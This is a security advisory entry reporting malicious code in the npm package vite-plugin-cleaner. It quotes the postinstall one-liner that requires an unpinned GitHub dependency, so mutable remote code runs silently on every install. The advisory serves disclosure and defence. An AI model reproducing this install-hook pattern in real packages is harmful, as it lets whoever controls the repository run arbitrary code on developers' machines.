VDB
KO

MAL-2026-13463

Malicious code in vite-plugin-cleaner (npm)

Details

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (35bc445ea196f979ad69189f4498586a09a51855b97e95dea02d01d197620237) package.json declares an optionalDependency `vite-cleaning-tools` pointing at `github:vite-plugins/vite-cleaning-tools` with no commit SHA or tag, so npm resolves and fetches whatever code is at the current HEAD of that GitHub repository at install time. The `postinstall` script then runs `node -e "try { require('vite-cleaning-tools') } catch(e) {}"`, executing that fetched code on every `npm install` while a try/catch silently swallows any errors. Because the reference is mutable and lives outside the npm registry, the maintainer (or anyone who gains write access to the GitHub repository) can change what runs on installer machines at any moment without publishing a new npm version, and npm registry scanning does not cover the fetched payload.

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / vite-plugin-cleaner

No fixed version published yet for vite-plugin-cleaner (npm). Pin to a known-safe version or switch to an alternative.

References